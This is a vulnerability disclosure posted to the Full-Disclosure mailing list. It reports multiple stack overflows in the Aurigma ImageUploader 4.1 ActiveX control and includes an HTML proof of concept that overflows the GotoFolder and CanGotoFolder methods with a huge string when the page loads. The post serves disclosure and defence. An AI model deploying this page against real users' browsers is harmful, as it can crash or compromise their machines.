Aurigma ImageUploader 4.1 Multiple stack overflows

[Elazar Broad <elazarb () earthlink net>]

There are multiple stack overflows in the Aurigma ImageUploader 4.1 ActiveX control. I believe this control was 
installed by www.dotphoto.com. PoC as follows:

-----------------------
<!--
 written by e.b.
-->
<html>
 <head>
  <script language="JavaScript" DEFER>
    function Check() {
    var s = "AAAA";

     while (s.length < 999999) s=s+s;

     var obj = new ActiveXObject("Aurigma.ImageUploader.4.1"); //{6E5E167B-1566-4316-B27F-0DDAB3484CF7}
      obj.GotoFolder(s);
      obj.CanGotoFolder(s);

   }
  </script>

 </head>
 <body onload="JavaScript: return Check();">
 </body>
</html> 

-----------------------


Elazar

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/